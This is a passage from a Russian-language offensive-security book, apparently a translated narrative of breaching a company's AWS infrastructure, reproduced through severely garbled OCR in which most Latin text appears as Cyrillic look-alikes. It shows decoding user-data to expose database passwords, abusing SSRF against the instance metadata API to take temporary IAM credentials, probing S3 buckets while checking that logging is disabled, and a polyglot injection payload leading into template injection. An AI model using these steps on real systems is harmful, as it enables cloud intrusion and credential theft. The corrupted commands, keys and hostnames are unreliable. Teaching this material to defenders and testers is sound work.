Ө [5егуісе] # Настройка службы 
ЕпуігоптепЕҒіЛе= /ефс/есг_епу. Де # Переменные окружения 
Ө ЕхесЅїагїРге=/иѕг/Біп/роскег ри. 5{081 } /дето-с1іепі:таѕїег 


Ө ЕхесЅіагі=/иѕг/Біп/Ооскег гип \ 


-\ /сопЁ Р\іЛеѕ /Лоддег.хті.: /орі/могкѕрасе/1од.хті \ 
--пеё=һоѕё \ 
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- -епу-ЕДе=/е{с/епу. Де \ 
- -епу-ЕДе=/ефс/)ауа_ор%$_епуи. Ре \ 
Ө --епу-Ғ\Ле=/еёс/ѕесгеіѕ.епу \ 
--паме дето-с1лепі \ 
${081 }/дето-с1іепё:таѕёег \ 
- - сокращено- - 


Сначала происходит настройка службы, которая будет выполняться 
во время загрузки машины ®. Эта служба извлекает образ демонстра- 
ционного клиентского приложения Ө и приступает к запуску контей- 
нера с помощью команды росКег гип Ө. 

Обратите внимание на несколько переключателей - -епу-ҒЛе Ө, 
которые запрашивают у "РосКег загрузку переменных среды из поль- 
зовательских текстовых файлов, один из которых так удобно называ- 
ется ѕесгеЁѕ .епу! Вопрос на миллион: где находятся эти файлы? 

Есть небольшой шанс, что они размещены непосредственно в обра- 
зе АМІ, но тогда внесение обновлений в файлы конфигурации станет 
для МХА Аа$ источником ужасной головной боли. Чтобы обновить, 
например, пароль базы данных, компании необходимо собрать и раз- 
вернуть новый образ СогеО$. Не очень-то эффективно. Нет, скорее 
всего, файл секретов либо динамически загружается через 53, либо 
встроен непосредственно в тот же сценарий изег-да*а. Действитель- 
но, если мы прокрутим немного дальше, мы наткнемся на следующий 
фрагмент: 


- -сокращено- - 
иге_Ее5: 

- сопёепё: НАЅІАЕјмоМдАА1302060085С4Т13ҮХорО5ҒатЕдс24дҮуВОБтгиі Јтст+Ү4Е16/... 
епсодіпд: д2ір+раѕеб4 

раһ: /еёс/ѕесгеЁѕ.епу 

регтіѕ510п5: "750" 

- -сокращено- - 


Чудесно! Содержимое этого большого двоичного объекта закоди- 
ровано с помощью Баѕеб4, поэтому мы декодируем его, распаковы- 
ваем и восхищаемся содержимым, которое показано в листинге 5.5. 


Листинг 5.5. Фрагмент декодированного файла зесге{$ . епу, 
содержащего пароли 


гооЁ@Роіпї1:~/# есһо Н4ЅІААА... |Баѕеб4 -@ |дип2ір 


АМАГҮТІСЅ_ ЏВІ_ СНЕСКЅЏМ_ЅЕЕО = 180309210013 

САЅЅАМОВА_АОЅ ЏЅЕАЅҮМС_РАЅ5 = 076ЬһОМіСргОРеёІһ+Ѕу 
САЅЅАМОВА_АОЅ ТВАСКІМС_РАЅ5 = б8піМАТІРАе5507749Р 
САЅЅАМОВА А05 РАЅЅ = РУ5К75ВУОЕКО №1 сММЗ 
САЅЅАМОВА_АОЅ РЕ ТУЕКҮСОМТАОГ_РАЅ5 = З0МИИН$\ииЦуо003 3 аЕИ 
ТАЗ АЦТН_РА$$ = РЗО7ипНЕЭВВНО? ИХ м 

А0$_ОВ_РАЗЗМОВО = !090#:9#384 сМ] 
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Джекпот! Двоичный объект содержит множество паролей для до- 
ступа к кластерам Саѕѕапага (Саззапага – это высоконадежная база 
данных №801, обычно развертываемая для обработки крупномас- 
штабных данных с минимальной задержкой). Мы также получаем два 
малоизвестных пароля с неясными перспективами. Конечно, одних 
паролей недостаточно. Нам нужны соответствующие хост-компьюте- 
ры и имена пользователей, но они также нужны и приложению, по- 
этому мы можем предположить, что второй файл среды епу.РЦе из 
листинга 5.4 должен содержать все недостающие части. 

Однако, прокручивая пользовательские данные дальше, мы не на- 
ходим определения епу. Ре. Но мы наткнулись на сценарий оболоч- 
ки деї-гедіоп-рагатѕ.ѕћ, который, вероятно, сбрасывает наш драго- 
ценный файл епу. Де (листинг 5.6). 


Листинг 5.6. Служба обнаружения, которая взаимодействует с епу. Ғ\Ле 


- - сокращено- - 
- соммапд: ѕЁагі 
сопЁепё: |- 

[Уп] 
реѕсгірёіоп=ріѕсоуег ІРѕ Фог ехїегпа1 ѕегуісеѕ 
[5егуісе] 
Туре=опеѕћої 
ЕхесЅёагЁРге=/иѕг/Біп/гт -Ё /еёс/епу.Ё\Ле 
ЕхесЅёагі=/сопЁ_ҒАЛеѕ /деі-гедіоп-рагатѕ.5ћ 
паме: деҒіпе- гедіоп-рагатѕ. ѕегуісе 

- - сокращено- - 


Скорее всего, этот скрипт создаст файл епу. Де. Давайте углубим- 
ся в содержимое деЁ-гедіоп-рагатѕ.5һ, созданное тремя строками 
ниже (листинг 5.7). 


Листинг 5.7. Строки, отвечающие за создание де*-гед\оп-рагат$.$Н 
в скрипте изег-да*а 


- - сокращено- - 
мгіёе Ғі1еѕ: 
® - сопіеп: Н45ТАААААААС / 7уаБи/аѕһЬНнз/ 
ЕТТЕтидтјХО1т61Хој984А06и50910реургмЕ+... 
епсойіпд: 921р+раѕеб4 
раһ: /сопЁ ҒіЛеѕ/деҒіпе-гедіоп-рагатѕ.ѕһћ 


Итак, у нас есть еще один закодированный двоичный объект Ө. 
Используя немного магии команд Баѕеб4 и диџпгір, мы переводим эту 
кучу мусора в обычный скрипт Баѕћ, который определяет различные 
конечные точки, имена пользователей и другие параметры в зависи- 
мости от региона, где работает машина (листинг 5.8). Я пропущу мно- 
жество условных ветвей и операторов сазе/ м св, чтобы показать вам 
только нужные части. 
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Листинг 5.8. Фрагмент расшифрованного скрипта де*-гед\оп-рагам$ .$В 


гоої@Роіпё1:~/# есһо Н4$ТААА. .. |Базеб4 -@ |дип2ір 


А2=5(сиг1 -5 һр: //169.254.169.254/1аіеѕі/теёа-аёа/р1асетепё/ауаіЛаБіл1і+у-гопе) 
ВЕСТОМ=${А7%?} 


саѕе ЅКЕСІОМ№ іп 
ар-ѕоџЁћеаѕё-1... 


., 


еу-ме${-1 


есһо 
есһо 
есһо 
есһо 
есһо 
есһо 


"ЅЗВОСКЕТ=тхгайѕ-41" >> /еёс/епу.Ғ\Ле ® 

"53МІ5С=тхгайѕ-тіѕс" >> /еёс/епу.Ғ\Ле Ө 

"АЕР15 СЕО НОЅТ=гедіѕ -део1осаііоп.ргойисіоп.еџи1.тхгайѕ.ёесһ" >> /еёс/епу. Де 
"САЅЅА РС=еџ-меѕі-е1імегу" >> /еіс/епу.ҒіЛе 

"САЅЅА ЏЅЕВ_ЅҮМС=иѕегѕупс-еџм1" >> /еЁс/епу.ҒАЛе 

"САЅЅА ЏЅЕВ РІМАҮ=иѕегӣс-еџм1" >> /еіс/епу. Ле 


- сокращено - - 
саѕѕапіга_де1імегу һоѕ&="саѕѕапіга-е\іуегу.ргой. ${5НОАТ АЕСІО№)} .тхгайѕ. ёесһ" 
- сокращено - - 


Обратите внимание на бакеты 53 тхгайѕ-й1 Ө и пхгайѕ-тіѕс Ө, с ко- 
торыми мы столкнулись ранее во время разведки. 

Глядя на сценарий, мы видим, что экземпляр использует АРІ ме- 
таданных для извлечения своего собственного региона и создания 
конечных точек и имен пользователей на основе этой информации. 
Это первый шаг компании к отказоустойчивости инфраструктуры: 
она упаковывает приложение, точнее среду, которая может работать 
на любом гипервизоре, в любом центре обработки данных, в любой 
стране. Мощная штука, конечно, с той оговоркой, что, как мы видим 
своими глазами, простая уязвимость 55ВЕ может раскрыть все секре- 
ты приложения любому, кто пожелает в них покопаться. 


В декабре 2019 г. АИ выпустили вторую версию АРІ 
метаданных, которая начинает с запроса РОТ для получения токена 
сеанса. Чтобы запросить АРІ метаданных второй версии, необходимо 
предоставить действительный токен. Это ограничение эффективно 
препятствует таким атакам, как 55КЕ. Вы можете подумать, что 
все пропало, но АИ пошли дальше и выстрелили себе в ногу следующим 
заявлением: «Существующая служба метаданных экземпляра (1МО5у1) 
полностью безопасна, и АИ/5 продолжит ее поддержку». Ну да, компании 
непременно будут вкладывать средства в переписывание всего процесса 
развертывания, чтобы заменить безопасную версию на безопасную. По- 
хоже, у атак 85КЕ все еще впереди светлое будущее. 


Сопоставив этот файл с паролями, которые мы получили из лис- 


тинга 5.5, и сделав обоснованные предположения, исходя из имен пе- 
ременных, мы можем восстановить следующие учетные данные: 
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саззапага-4еПуегу.ргоЯ.еи\м/ 1 .тхгайѕ.їесһ 


Имя пользователя: изег4с-еим1 
Пароль: 9ОМУУН$\ицИуо003 } [0 


саѕѕапага-иѕегѕупс.ргоа.ео\1.тхгаӣѕ.іесһ 


Имя пользователя: изегзупс-ецм1 
Пароль: 076БНОМАСргОРееТтВЕ$ у 


На некоторых машинах отсутствуют имена пользователей, а на 
других паролях отсутствуют соответствующие им имена хостов, но со 
временем мы все это выясним. На данный момент это все, что мы 
можем собрать полностью. 

Теперь единственное, что мешает нам получить доступ к этим ба- 
зам данных, - это скучные базовые правила брандмауэра. Известные 
нам конечные точки резолвятся во внутренние ГР-адреса, недоступ- 
ные из темного уголка интернета, где находится наш атакующий 
сервер, поэтому, если мы не найдем способ изменить эти правила 
брандмауэра или вообще обойти их, мы так и останемся с кучей бес- 
полезных учетных данных. 

Ксчастью, это не совсем так. Есть один набор учетных данных, кото- 
рый мы еще не получили, и, в отличие от предыдущих, на него обычно 
не распространяются ограничения [Р-адреса: роль [АМ машины. 

В большинстве облачных провайдеров вы можете назначить маши- 
не роль, которая представляет собой набор учетных данных по умол- 
чанию. Это дает машине возможность беспрепятственно проходить 
аутентификацию у облачного провайдера и наследовать любые раз- 
решения, назначенные этой роли. На эту роль может претендовать 
любое приложение или скрипт, работающий на машине, и это позво- 
ляет избежать дурной привычки жестко задавать секреты в коде. Вы- 
глядит прекрасно, но только на бумаге. 

На самом деле, когда машина ЕС2 (или, точнее, профиль экземп- 
ляра) реализует роль ІАМ, она извлекает набор временных учетных 
данных, воплощающих привилегии этой роли. Эти учетные данные 
становятся доступными для машины через... барабанная дробь... АР1 
метаданных. 

Мы вызываем конечную точку /Лаїеѕї /теЁа-фаа/іат/ѕесигі - 
{у-сгедеп{1а15$, чтобы получить имя роли: 


һер: / /Оха9Теа9 Те /Лафез* /мефа-Фафа/1ат/зесиг\{у-сгедеп\а1$ 
бето - го1е.ес2 


Мы видим, что машине была назначена роль ето - го1е.ес2. Давай- 
те извлечем ее временные учетные данные, снова вызвав АРІ мета- 
данных: 


# Реквизиты для входа 
һер: //дха9Ғеа9ғҒе/Лаёеѕі/теба-йаёа/іат/ѕесигібу-сгейепё\а15/ето- го1е.ес2 
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Сойе : Ѕиссеѕѕ, 

Гаѕ0раа+еа : 2020-10-26711:33:397, 

Туре : АМЅ-НМАС, 

Ассеѕ5КеуІа : А$ТА447ВК6И$АНХ6УССТ , 

ЅесгеЁАссеѕ5Кеу : пМу1ттЬтћНсОпХи2е2Зоһбпһ /м25Ри8ЧТ5МаН2Ь, 
Токеп : АдоЈЬ37р2210Х21ЈЕҒО... 

Ехрігаїіоп : 2020-10-26717:53:417 Ө 


Мы получаем Ассеѕ5КеуІй и ЅесгеАссеѕ5Кеу, которые вместе обра- 
зуют классические учетные данные АМҮ АРІ, а также токен доступа, 
который проверяет этот набор временных учетных данных. 

Теоретически мы можем загрузить эти ключи в любой клиент АМ/5 
и взаимодействовать с учетной записью МХК Ад с любого ІР-адреса 
в мире, используя идентификатор машины ето- го1е.ес2. Если эта 
роль разрешает машине доступ к бакетам $3, у нас есть к ним полный 
доступ. Если роль позволяет останавливать экземпляры, теперь это 
можем и мы. Мы можем пользоваться привилегиями этого экземп- 
ляра в течение следующих шести часов, прежде чем учетные данные 
будут сброшены Ө. 

Когда этот льготный период истечет, мы снова сможем получить 
новый набор действительных учетных данных. Теперь вы понимае- 
те, почему 58КЕ – мой лучший друг. Далее мы регистрируем учетные 
данные АҮ в нашем домашнем каталоге с именем профиля ето: 


# На нашей атакующей машине 

гооє@Роіпі1:~/# уі -/.ам$ /сгейепёіа15 

[ето] 

амѕ_ассеѕѕ_Кеу ій = А$ТА447ВК6М$Х2ВВЕТХС 
амз_зесге{_ассе$$_Кеу = +АС)ХВ87паМХуККЭМюИ / 5г /+В /+75РгтВ7 
амѕ_5еѕѕіоп_Ёокеп = АдоЈЬ37р221... 


Кажется, нам везет! К сожалению, как только мы начинаем подби- 
раться ближе к цели, АМЅ наносит нам еще один удар: сервис ІАМ. 


Мы можем использовать эти конкретные учетные 
данные АИ, добавив ключ - -рго Це депо к нашим обычным командам 
интерфейса командной строки АИ/5 или установив глобальную пере- 
менную АМ5_РКОЕТЕЕ=Чепо. 


АИ 1АМ 


АМҮЅ ТАМ - это сервис аутентификации и авторизации, иногда похо- 
жий на непроходимое болото. По умолчанию пользователи и роли 
имеют почти нулевые привилегии. Они не могут видеть свою соб- 
ственную информацию, такую как имена пользователей или иденти- 
фикаторы ключей доступа, потому что даже эти тривиальные вызовы 
АРІ требуют явного разрешения. 
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Сравните А [АМ со средой Асйуе Гитесюгу (АР), где 
пользователи по умолчанию могут не только получать информацию 
о каждой учетной записи и членстве в группе, но и хешированные паро- 
ли, принадлежащие сервисным учетным записям. Ознакомьтесь с тех- 
нологией АР Кегрегоаѕііп= по адресу һр //011.1у/2:0рОЈт. 


Очевидно, что обычные пользователи ІАМ, такие как разработчи- 
ки, имеют некоторые базовые права на самопроверку, поэтому они 
могут делать такие вещи, как перечисление своего членства в груп- 
пах, но это вряд ли относится к профилю экземпляра, прикреплен- 
ному к машине. Попытавшись получить базовую информацию о роли 
депо-го1е-ес2, мы получаем поразительную ошибку: 


# На атакующей машине 
гооє@РоіпЁ1:~/# аиз іам деЁ-го1е \ 
--го1е-пате йето-го1е-ес2 \ 
--ргоЁіЛе демо 


Ап еггог оссиггед (Ассеѕ5репіей) мһћеп са111пд {Ве бефВо\е орегаёіоп: Џѕег: 
агп:ам5 :5 5: :886371554408 : аѕѕитей- го1е/дето-го1е.ес2/1-088с8е93105703ссс 
15 поё аџёћогігей фо регЁогт: іат:СеАо1е оп гезоигсе: го1е дето-го\е-ес2 


(Произошла ошибка (доступ запрещен) при вызове операции СбеВо1е: Пользователь: 
агп: амс: $15: :886371554408: аѕѕитей-го1е/дето-го1е.ес2/1-088с8е93105703ссс не 
авторизован для выполнения: 1ат:бе{Во\е на ресурсе: ето-го1е-ес2) 


Приложение обычно не оценивает свой набор разрешений во вре- 
мя выполнения; оно просто выполняет вызовы АРІ в соответствии 
с кодом и действует соответственно. Это означает, что у нас есть дей- 
ствительные учетные данные А\М5, но на данный момент мы совер- 
шенно не знаем, как их использовать. 

Нам придется провести небольшое исследование. Почти у каждого 
сервиса АМ есть вызов АРІ, описывающий или перечисляющий все 
его ресурсы (дезсг\Бе-1п${апсез для ЕС2, 115#-Ббискеіѕ для 53 и так 
далее). Мы можем постепенно начать исследовать наиболее распро- 
страненные сервисы, чтобы увидеть, что мы можем сделать с этими 
учетными данными, и продвигаться к тестированию всех бесчислен- 
ных сервисов АМ№Ѕ. 

Один из вариантов - сойти с ума и пробовать все возможные вы- 
зовы АРІ АМ (а их тысячи), пока не будет получен авторизованный 
доступ, но лавина ошибок, которые мы вызовем в процессе, заставит 
проснуться любую группу безопасности. По умолчанию большинство 
вызовов АМ АРІ регистрируются, поэтому компании не составиттру- 
да настроить оповещения, отслеживающие количество несанкцио- 
нированных вызовов. А почему бы и нет? Эти оповещения можно 
настроить буквально в несколько кликов через службу мониторинга 
СІоџауаїѓсћ. 

Кроме того, АМҮЅ предоставляет сервис под названием Сиагариѓу, 
который автоматически отслеживает и сообщает о всевозможных 
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необычных действиях, например о спаме 5000 вызовов АРІ, поэтому 
осторожность имеет первостепенное значение. Это вам не провинци- 
альный банк с 20 правилами безопасности и аутсорсинговой коман- 
дой айтишников, которая все еще пытается собрать и проанализиро- 
вать события УЛпдомз. Мы должны быть умными и анализировать 
контекст. 

Например, помните бакет 53 пхгад$-41, который добрался до поль- 
зовательских данных этого экземпляра? Раньше мы не могли по- 
лучить к нему доступ без учетных данных, но, может быть, у роли 
депо-го1е.ес2 есть какие-то привилегии 53, которые могли бы пре- 
доставить нам доступ? Мы узнаем это, обратившись к А№5 АРІ, чтобы 
получить список бакетов 55 МХВ Аа: 


# На нашей атакующей машине 

гооЁ@Роіпї1:~/# амз 53арі 11${БисКеф$ - -ргоҒі1е ето 

Ап еггог оссиггед (Ассеѕ5репіед) ипеп са114пд һе 115 Вискеѕ орега\оп: 
Ассеѕ5 епіей 


(Произошла ошибка (доступ запрещен) при вызове операции 115#Вискеёѕ: Отказано 
в доступе) 


Ну ладно, попытка получить список всех бакетов 53 в аккаунте была 
слишком смелой, но она того стоила. Давайте вернемся назад и по- 
пробуем двигаться маленькими детскими шажками. Снова исполь- 
зуя роль йето-го1е.ес2, мы пытаемся просто получить список ключей 
внутри бакета пхгайѕ-й1. Как вы помните, ранее нам было отказано 
в доступе без учетных данных: 


гооЁ@Роіпї1:~/# амѕ 53арі 115&-објесіѕ-у2 --ргоР\Де Пето --БискеЁ тхгайѕ-01 > 
1151 објесіѕ д1.їхі 

гооє@РоіпЁ1:~/# дгер '"Кеу"' 115  орјесіѕ 41 | ѕеа '5/[", ]//9' > 

1151 Кеуз_91. хе 

гооє@Роіп1:~/# һеаа 1151 Кеуѕ д1.Ехё 

Кеу: јаг/тауеп/агїіҒасё/сот. ѕдџагеир.окһё&рз /1оддіпд-іпёегсеріог/4.2.2 

Кеу: јаг/тамеп/агїі Ғасё/сот.1оддег. 109/1099іпд-со10г5/3.1.5 

- -сокращено- - 


Теперь виден какой-то прогресс! Мы получаем список ключей 
и сохраняем его. В качестве меры предосторожности мы можем убе- 
диться, что ведение журнала действительно отключено для операций 
с объектами 53. Для этого мы вызываем АРІ де -Биске - 10991п9: 


гооЁ@Роіпї1:~/# амз 53арі деё-БискеЁ-10ддіпд --ргоҒіЛе епо --БисКее мхгад$-91 


<етрфу_гезроп$е> 


И получаем пустой ответ. Журнал не ведется. Идеально. Вам мо- 
жет быть интересно, почему вызов этого малоизвестного АРІ удал- 
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ся. Зачем профилю экземпляра такое разрешение? Чтобы понять это 
странное поведение, ознакомьтесь с полным списком возможных 
операций 53 на странице /Нр5./40с$.а//5.атагоп.сот/. Да, есть сотни 
операций, которые можно разрешить или запретить в бакете. 

Разработчики АМГ5 проделали впечатляющую работу, определив 
очень подробные разрешения для каждой крошечной и иногда не- 
существенной задачи. Неудивительно, что большинство админист- 
раторов при настройке бакетов просто назначают подстановочные 
разрешения. Пользователю нужен доступ к бакету только для чте- 
ния? (е{* к вашим услугам; мало кто задумывается о том, что беї* 
подразумевает 51 разрешение только на 53! беЕВискеїРо11ісу для по- 
лучения политики, бе{Виске{сов$ для получения ограничений СОВ, 
СеіВисКе+АСІ для получения списка управления доступом и т. д. 

Политики бакетов в основном используются для предоставления 
доступа к внешним учетным записям А\МГ или добавления еще одно- 
го уровня защиты от чрезмерно мягких политик ІАМ, предоставлен- 
ных пользователям. Как следствие пользователь с разрешением $3:* 
может быть отклонен с помощью политики бакета, которая разреша- 
ет доступ только некоторым пользователям или требует обращения 
только с заданного ІР-адреса. Здесь мы пытаемся получить полити- 
ку бакета для мхгад$-91, чтобы узнать, разрешает ли она доступ к ка- 
ким-либо другим учетным записям АМҮ: 


гооё@Роіп1:~/# амз $Зар\ деі-БискеЁ-ро1ісу --БисКее мхгад$-91 
{ 
"та": "Ро14су1572108106689", 
"МУегѕіоп": "2012-10-17", 
"Ѕаёемепё": [ 
{ 
"514": "5 т 1572108105248", 
"Асёіоп": [ 
"53:14151%*", " 53: 0еі*" 
17 
"ЕҒҒесЕ": "А1Лом", 
"Везоигсе": "агп:амѕ:53:::тхгайѕ-41", 
"Ргіпсіра1": { 
© "АМ": "агп:амѕ:іат: :983457354409: гоої" 


ҺП 


Эта политика ссылается на внешний аккаунт АМ/$ 983457354409 Ө. 

Этот аккаунт может принадлежать Стгеїѕсһ РоН@со, внутреннему 
отделу МХК Ад$ с собственной учетной записью АМ или оказаться 
личной учетной записью разработчика, если на то пошло. Мы не мо- 
жем знать наверняка, по крайней мере пока. Мы отметим его для по- 
следующего изучения. 
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Изучение списка ключей 


Мы возвращаемся к загрузке всего списка ключей бакета и погружа- 
емся в эту кучу, надеясь найти конфиденциальные данные и получить 
представление о назначении бакета. У нас есть впечатляющее коли- 
чество общедоступных двоичных файлов и файлов .јаг. Мы находим 
подборку различных версий файлов от основных игроков на рынке 
программного обеспечения, таких как М№еіпх, ]ауа и [024]. Кажется, 
вместе они образуют общедоступную точку распространения обнов- 
лений. Мы находим пару скриптов БазЬ, которые автоматизируют 
команду ОБоскКег 1одіп или предоставляют вспомогательные функции 
для команд А\МГ5, но ничто не похоже на конфиденциальные данные. 

Из этого мы делаем вывод, что данный бакет, вероятно, действует 
как общекорпоративный центр распространения установочных паке- 
тов. Системы и приложения должны использовать его для загрузки 
обновлений программного обеспечения, пакетов, архивов и других 
распространенных пакетов. Думаю, не каждый публичный бакет $3 — 
это сундук с сокровищами, ожидающий, когда его украдут. 

Мы обращаемся к скрипту чзег-дафа, который загрузили ранее, 
в надежде найти дополнительные подсказки о службах для запроса, 
но не находим ничего примечательного. В отчаянии мы даже мо- 
жем попробовать пару АРІ-интерфейсов АМ/Ѕ с учетными данными 
демонстрационной роли для общих сервисов, таких как ЕС2, Іатраа 
и ВедзЫИ, только для того, чтобы получить в ответ восхитительное 
сообщение об ошибке. Как неприятно иметь настоящие ключи и сто- 
ять в замешательстве у входной двери только потому, что есть тыся- 
ча замочных скважин, которые нужно попробовать... но так бывает 
иногда. 

Как и в большинстве тупиков, единственный способ пройти впе- 
ред - это вернуться назад, хотя бы временно. Не то чтобы данные, 
которые мы собрали до сих пор, бесполезны; у нас есть база данных 
и учетные данные А\М5, которые могут оказаться полезными в буду- 
щем, и, прежде всего, мы получили некоторое представление о том, 
как компания управляет своей инфраструктурой. Нам нужна только 
крошечная искра, чтобы вспыхнул пожар. А еще нам нужно прове- 
рить около сотни доменов. Мы справимся с этим. 


Дополнительные ресурсы 


• Здесь вы найдете краткое введение в Вигр, если вы незнакомы 
с этим инструментом: №Ёр./Ьй.у/2ОЕОто9. 


• Изучите новые упражнения в стиле захвата флага на странице 
һір://аиѕ.сІоиа/, чтобы познакомиться с основными приемами 
взлома облачных служб. 


• СоцаВиппу и Ёау-ир - это инструменты, которые помогут вам вы- 
явить ІР-адреса служб, скрывающихся за СОМ: ћі1рѕ ;//9/ћир.сот/аг- 
Лор/ЧоиаВиппу/ и ћїірѕ://дйһир.сот/ріе[со11/ау-ир/. 
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Вы можете узнать больше о методах раскрытия имен бакетов по 
следующим ссылкам: ћіїір;//і.1у/36КуОп2 и һіїр;//0і.1у/39Хубһа. 


Разница между записями СМАМЕ и АШАЅ показана на ћір//ії. 
1у/2ЕВҮЏоР0. 


Если вам нужны быстрые результаты, на этом веб-сайте перечисле- 
ны открытые бакеты $3: ћіїрѕ://рискеѓѕ.дгауһаіуагјаге.сот/. 


Дополнительную информацию о политиках бакета 55 можно найти 
по адресу №#р5 //атхп 0/2 МЬйпду. 


Дополнительная информация о \УеБосКе{з доступна по адресу 
Вр ЛЬДУ 5ЕЅТНМ. 


Посетите блог о 1М05ү2: ћіїрѕ ;//70.0и/5/3 5Е2/дЕ. 
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ПОЛНОЕ ПОГРУЖЕНИЕ 


Ощущение дискомфорта означает, что мы стоим на пороге новых озарений. 
Лоуренс Краусс 


ПРОНИКНОВЕНИЕ 


На данный моменту нас есть несколько учетных данных 
МХК А5, и мы выяснили в общих чертах, как устроена 
инфраструктура компаний МХК А45 и СР, но пока непо- 
нятно, что делать с нашими находками. У нас еще полно 
возможностей для изучения, поэтому мы вернемся к чер- 
тежной доске: несколько веб-сайтов СР и МХВ А5, которые 
мы нашли в главе 4 (листинг 4.3). В главе 5 мы прислушались к сво- 
ей интуиции и принялись исследовать самые привлекательные ак- 
тивы - бакеты 53, что в конечном итоге привело нас к обнаружению 
уязвимости подделки запросов на стороне сервера (55ВЕ). Но теперь 
мы будем придерживаться более стабильного и трудоемкого подхода. 

Мы пройдемся по каждому веб-сайту, перейдем по каждой ссылке, 
проверим каждый параметр и даже соберем скрытые ссылки в фай- 
лах ]ауазсирь используя что-то вроде ШпКЕіпаег (ћ1р5;//9/ћир.сот/ 
СегБепЈауаао/.іпкЕіпаег/). Для этого мы будем вводить тщательно по- 
добранные специальные символы в формы и поля везде, где только 
можно, пока не вызовем аномалию, такую как явная ошибка базы 
данных, ошибка 404 (страница не найдена) или неожиданное пере- 
направление на главную страницу. 

Для захвата всех параметров, тайно отправленных на сервер, мы 
будем использовать Вигр. Этот маневр сильно зависит от инфраструк- 
туры веб-сайта, языка программирования, операционной системы 
и некоторых других факторов, поэтому, чтобы упростить процесс, мы 
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внедрим следующую полезную нагрузку и сравним вывод с нормаль- 
ным ответом приложения: 


адаа", ' |85; : `({{@<%=999 


Эта строка охватывает наиболее очевидные случаи уязвимостей 
внедрения (їпјесіоп ушпегаБііійеѕ) для различных платформ: (№) 
ОГ, системные команды, шаблоны, облегченный протокол досту- 
па к каталогам (Глебеме1е Е Рігесіогу Ассеѕѕ Рготосо|, ГРАР) и почти 
любой компонент, использующий специальные символы для расши- 
рения своего интерфейса запросов. Фрагмент аааа играет роль свое- 
образной метки. Это текст, который легко заметить, чтобы визуально 
найти полезную нагрузку в ответе страницы. Страница, которая хоть 
немного неожиданно реагирует на эту строку, например возвраща- 
ет страницу с ошибкой, любопытным перенаправлением, усеченным 
выводом или входным параметром, отраженным на странице стран- 
ным образом, является многообещающей зацепкой, которую стоит 
изучить дальше. Если веб-страница возвращает безобидный ответ, 
но, кажется, каким-то образом преобразовала или отфильтровала 
ввод, то мы можем продолжить исследование, используя более про- 
двинутые полезные нагрузки, такие как добавление логических опе- 
раторов (АМ№ 1=0), указывающих на реальное местоположение файла, 
реальные команды и так далее. 

Итак, мы начинаем вводить эту полезную нагрузку в формы на 
каждом сайте в нашем списке. Достаточно скоро мы добираемся до 
ПВГ, ими". зигуеузапа$а5.сот, печально известного веб-сайта, использу- 
емого для сбора и исследования данных о личностях людей, которые 
мы обнаружили в главе 4. Здесь есть множество полей, в которые мож- 
но ввести нашу якобы беспорядочную строку. Мы вводим ее в форму, 
нажимаем кнопку отправки, и нас приветствует восхитительная стра- 
ница с ошибкой, показанная на рис. 6.1. 


ѕигуеуѕапаѕїаїѕ.сот 


Іпёегпа] Зегуег Еггог 


Тһе ѕегуег епсоџпіегей ап ицегпа| еггог апі уаѕ ива Ме іо сотріІеѓе уотг гедиеѕі. Еіһег һе ѕегуег 
еге 15 ап еггог ш һе аррИсаНоп. 


Рис. 6.1. Ѕигуеуѕапдѕїаїѕ.сот реагирует на нашу инъекцию строковых данных 


Ага! Такая ошибка может заставить хакера ерзать на стуле от вол- 
нения. Мы обращаемся к Вигр и снова отправляем форму, на этот 
раз с совершенно невинными ответами на вопросы, без добавления 
специальных символов, только на простом английском языке, чтобы 
убедиться, что форма нормально работает (рис. 6.2). При нормальном 
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выполнении форма должна отправить нам подтверждение по элект- 
ронной почте. 


Кедиеѕї Кеѕропѕе 
_[Вам | Рагатѕ [неааеѕ [нех | {вама Неадегѕ | Нех | НТМЕ [вел 
РОЗТ /Ѕ5рРКІАр НТТР/.1 ^ 
НозЕ ммм.ѕигуеуѕапаѕіаіѕ сот Сопќепі-Туре: їехіћіті; сһагѕе=и#-8 
Узег-АдепЕ МогШа/5.0 (Муіпаомѕ МТ 10.0; Міпб4; х64; гу:69.0) Сопіепі-епаќћ: 261 
Сопќепі-_епоїћ: 73 Госавоп: Һір:/Лмуму.ѕигуеуѕапаѕ!аќѕ.сот/ 
Соокіе: Х-Ат2-СЕРор: СОб53-С1 
АМ/ЗАЕВ=МЛ/х2СЗИНМО2ЕАВ!МЗО9ЭтСЬВ7+4м+29 НМОВ7Ст8/Т609Тх1 т м4рРОеск Х-Ат2-С+19: 85АР602641СУМ_АЦВЗ$Р! 
28у\/а2/63$1920++9020М$ИЗа$КЭРЗАЦАЙ0оНВк4о Мм 1+ ЕМхВЗУНСЕ2; Ѕегуег: амзеь/2.0 
МАХ-АСЕ=604800; Раіћ=/ Оаќе: Ѕип, 27 Осі 2019 11:57:30 СМТ 


|етай=дауііѕһам@рокетаі. пефпате=ауќіѕћам &91=2&492=2&493=3&94=3&45=5%&96=3 


Рис. 6.2. Отображение обычной отправки формы в Вигр 


И действительно, через пару секунд мы получаем электронное 
письмо с результатами опроса (рис. 6.3). 


ЕМА СОМРОЅЕ 1001$ АВОУЦТ 


« Васклю шох | Верь | Еогуага | _ Ѕһолх Огівіпа] ] 


'ТБапк уоо Гог сотріейп Һе соѕпіцуе зигуеу 


Егот: погеріау@ѕигуеуѕапӣѕїаїѕ.сот, То: дауійѕћам, Рае 2019-10-27 12:02:10 


НеПо ӣауійѕћауу 


ТһапкК уой юг сотріеіп= ће ѕшуеу. Уопг сопітірийор уі Вер и адуапсе Ватап КпоуЛейғе, 
апа Бер Байа а Бе{ег уғогіа. 


Рис. 6.5. Ответ по электронной почте из нашего обычного опроса 


Опрос работает нормально, а это значит, что, вероятно, какой-то 
специальный символ в нашей полезной нагрузке вызвал сбой стра- 
ницы в первый раз. Чтобы определить, какой именно символ, мы вос- 
производим предыдущую запись нормальной формы, добавляя по 
одному специальному символу из нашей полезной нагрузки за раз, 
пока не приблизимся к подозреваемому: {{ (двойные фигурные скоб- 
ки). Мы вполне можем иметь дело с инъекцией шаблонов на стороне 
сервера (Ѕегуег-ѕійе іетрІаїе іпјесііоп, $5ТІ), поскольку в шаблонах 
часто встречаются двойные фигурные скобки. 


Инъекция шаблона на стороне сервера 


Во многих средах веб-разработки шаблоны представляют собой прос- 
тые НТМІ-файлы, аннотированные специальными переменными, ко- 
торые во время выполнения заменяются динамическими значения- 
ми. Вот некоторые из этих специальных переменных, используемых 
в различных фреймворках: 


# Шаблоны ВиБу 
<р> 
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<%= @ргодисЕ %> 

</р> 

# Шаблоны воспроизведения (Ѕса1а/Јауа) 
<р> 

